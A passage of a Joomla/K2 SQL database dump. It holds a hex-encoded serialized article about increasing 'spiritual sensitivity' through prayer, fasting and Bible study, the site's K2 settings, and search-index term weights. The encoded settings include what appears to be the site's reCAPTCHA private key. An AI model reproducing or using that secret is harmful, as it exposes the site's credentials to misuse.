c20616e642070656f706c652074686174206f70657261746520696e2066616c7365686f6f642e2046696e6420612067656e75696e65206d696e69737465722061726f756e6420796f752c206c697374656e20746f207468656d20616e6420617474656e64207468656972206d696e69737472792e3c2f6c693e0d0a3c6c693e496e63726561736520796f757220696e74616b65206f662074686520776f7264206f6620476f642e204f6e65206f6620746865207369676e73206f662073706972697475616c207369636b6e657373206973206c6f73696e6720617070657469746520666f722074686520776f7264206f6620476f642e20537475647920746865204269626c6520726567756c61726c792e205265616420746865206269626c65207468726f75676820696e206120796561722e3c2f6c693e0d0a3c6c693e496e63726561736520796f757220636f6e66657373696f6e206f662074686520776f7264206f6620476f642e20596f757220776f7264732061666665637420796f7572207370697269742e3c2f6c693e0d0a3c6c693e526567756c61722066617374696e672e2046617374696e67206973206120626f6f7374657220746f2073706972697475616c20616374697669746965732e204d616a6f72697479206f662043687269737469616e7320617265207374727567676c696e67206265636175736520746865792063616ee28099742067657420746f20746865206672657175656e6379207468617420476f6420697320636f6d6d756e69636174696e672077697468207468656d2e20596f752073686f756c64206e6f746520746861742066617374696e6720646f6573206e6f74206368616e676520476f642c2066617374696e67206368616e67657320796f752e2046617374696e672066696e652d74756e657320796f7572206672657175656e637920746f20746865206672657175656e6379206f662074686520486f6c79205370697269742e20496620796f75e280997265206e6f7420636f6e63656e74726174696e67206f6e20736f6d657468696e672073706972697475616c2c20796f7520617265206e6f742066617374696e6720627574206a75737420646f696e672068756e67657220737472696b652e20446f6ee2809974207573652066617374696e6720746f20627269626520476f6420746f206368616e676520486973206d696e6420636f6e6365726e696e672061206d61747465722e3c2f6c693e0d0a3c6c693e416c6c6f7720746865206672756974206f66207468652053706972697420746f2067726f7720696e20796f752e3c2f6c693e0d0a3c6c693e52656475636520656d6f74696f6e616c69736d2e20446f6ee2809974206c657420796f757220656d6f74696f6e73206f7220616e6f7468657220706572736f6ee280997320656d6f74696f6e732072756c6520796f752e204e656761746976652070617373696f6e20726564756365732073706972697475616c2073656e73697469766974792e20416e6765722c2077726174682c206d616c6963652c206f6666656e6365732061726520616c6c20656e656d696573206f662073706972697475616c2073656e73697469766974792e3c2f6c693e0d0a3c6c693e5370656e64206d6f72652074696d6520737065616b696e6720696e20746f6e6775652e3c2f6c693e0d0a3c6c693e496e7374616e74206f62656469656e636520746f20646976696e65207369676e616c2e20446976696e65207369676e616c7320636f6d65207468726f75676820796f757220636f6e736369656e63652e3c2f6c693e0d0a3c6c693e4c6561726e696e6720746f20726562756b652077726f6e6720737069726974732e204361737420646f776e206576657279206576696c20696d6167696e6174696f6e2c20616e7920616e797468696e67207468617420697320616761696e737420746865206b6e6f776c65646765206f6620476f642e204c6561726e20746f2077616c6b207769746820746865204c6f726420756e74696c20796f7572206865617274206973207374726f6e676572207468616e20796f757220627261696e2c20626f64792c20616e64206d656ee2809973206f70696e696f6e2e20596f757220626f6479206c616e677561676520696e207468652070726573656e6365206f6620476f642077696c6c207369676e616c20746865206174746974756465206f6620476f6420746f776172647320796f752e3c2f6c693e0d0a3c2f756c3e0d0a3c2f6469763e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031392d30382d30352032323a31343a3431223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223232223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31343a2236333a73656e7369746976697479223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a33333a222f636f6d706f6e656e742f6b322f6974656d2f36332d73656e7369746976697479223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3633223b733a353a22726f757465223b733a35313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d36333a73656e7369746976697479223b733a353a227469746c65223b733a33333a225761797320746f20496e63726561736520796f75722053656e7369746976697479223b733a31313a226465736372697074696f6e223b733a3233313a2220546f6461792c20492077616e7420746f207368617265207769746820796f752077617973207468617420796f752063616e20696e63726561736520796f75722073706972697475616c2073656e73697469766974792e205374617920617761792066726f6d20756e20616e6f696e7465642061746d6f7370686572652e2043726561746520616e2061746d6f737068657265206f662074686520616e6f696e74696e6720627920636f6e7374616e7420776f72736869702c207072616973652c20616e6420726567756c61726c79206c697374656e696e6720746f206d657373616765732e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031392d30382d30352032323a30383a3031223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031392d30382d30352032323a30383a3031223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms0`
--

CREATE TABLE `y57u5_finder_links_terms0` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms0`
--

INSERT INTO `y57u5_finder_links_terms0` (`link_id`, `term_id`, `weight`) VALUES
(295, 5, 0.00581),
(298, 5, 0.01743),
(301, 5, 0.01743),
(244, 5, 0.04669),
(273, 5, 0.04669),
(299, 5, 0.08134),
(304, 5, 0.09296),
(275, 5, 0.09338),
(305, 5, 0.10458),
(31, 5, 0.14007),
(159, 5, 0.14007),
(246, 5, 0.14007),
(250, 5, 0.14007),
(251, 5, 0.14007),
(255, 5, 0.14007),
(265, 5, 0.14007),
(266, 5, 0.14007),
(270, 5, 0.14007),
(160, 5, 0.18676),
(161, 5, 0.18676),
(247, 5, 0.18676),
(259, 5, 0.18676),
(260, 5, 0.18676),
(264, 5, 0.18676),
(308, 5, 0.18676),
(245, 5, 0.23345),
(248, 5, 0.23345),
(256, 5, 0.23345),
(258, 5, 0.23345),
(290, 5, 0.23345),
(168, 5, 0.28014),
(233, 5, 0.28014),
(241, 5, 0.28014),
(249, 5, 0.32683),
(261, 5, 0.32683),
(267, 5, 0.32683),
(235, 5, 0.37352),
(252, 5, 0.37352),
(272, 5, 0.37352),
(280, 5, 0.37352),
(288, 5, 0.37352),
(174, 5, 0.42021),
(236, 5, 0.4669),
(268, 5, 0.4669),
(269, 5, 0.4669),
(287, 5, 0.4669),
(274, 5, 0.51359),
(257, 5, 0.56028),
(263, 5, 0.56028),
(178, 5, 0.60697),
(238, 5, 0.60697),
(253, 5, 0.60697),
(292, 5, 0.60697),
(237, 5, 0.65366),
(254, 5, 0.79373),
(243, 5, 0.98716),
(262, 5, 1.21394),
(306, 5, 1.30732),
(193, 5, 1.32733),
(239, 5, 1.34734),
(240, 5, 1.67417),
(242, 5, 1.90762),
(31, 6, 0.88669),
(160, 6, 0.88669),
(250, 6, 0.88669),
(251, 6, 0.88669),
(31, 7, 0.98),
(160, 7, 0.98),
(250, 7, 0.98),
(251, 7, 0.98),
(31, 8, 0.88669),
(159, 8, 0.88669),
(160, 8, 0.88669),
(250, 8, 0.88669),
(251, 8, 0.88669),
(31, 9, 0.98),
(159, 9, 0.98),
(160, 9, 0.98),
(250, 9, 0.98),
(251, 9, 0.98),
(31, 10, 0.84),
(159, 10, 0.84),
(160, 10, 0.84),
(250, 10, 0.84),
(251, 10, 0.84),
(259, 10, 0.84),
(260, 10, 0.84),
(287, 10, 0.84),
(31, 11, 0.91),
(159, 11, 0.91),
(160, 11, 0.91),
(250, 11, 0.91),
(251, 11, 0.91),
(259, 11, 0.91),
(260, 11, 0.91),
(287, 11, 0.91),
(31, 12, 0.42),
(160, 12, 0.42),
(250, 12, 0.42),
(251, 12, 0.42),
(31, 13, 1.09669),
(160, 13, 1.09669),
(250, 13, 1.09669),
(251, 13, 1.09669),
(31, 14, 1.14331),
(160, 14, 1.14331),
(250, 14, 1.14331),
(251, 14, 1.14331),
(31, 15, 0.42),
(159, 15, 0.42),
(160, 15, 0.42),
(250, 15, 0.42),
(251, 15, 0.42),
(31, 16, 0.98),
(159, 16, 0.98),
(160, 16, 0.98),
(250, 16, 0.98),
(251, 16, 0.98),
(31, 17, 1.14331),
(159, 17, 1.14331),
(160, 17, 1.14331),
(250, 17, 1.14331),
(251, 17, 1.14331),
(298, 18, 0.0175),
(304, 18, 0.035),
(305, 18, 0.035),
(295, 18, 0.0525),
(159, 18, 0.14),
(160, 18, 0.14),
(161, 18, 0.14),
(235, 18, 0.14),
(236, 18, 0.14),
(241, 18, 0.14),
(245, 18, 0.14),
(247, 18, 0.14),
(248, 18, 0.14),
(258, 18, 0.14),
(261, 18, 0.14),
(267, 18, 0.14),
(287, 18, 0.14),
(308, 18, 0.14),
(299, 18, 0.21),
(31, 18, 0.28),
(238, 18, 0.28),
(250, 18, 0.28),
(251, 18, 0.28),
(253, 18, 0.28),
(256, 18, 0.28),
(273, 18, 0.28),
(275, 18, 0.28),
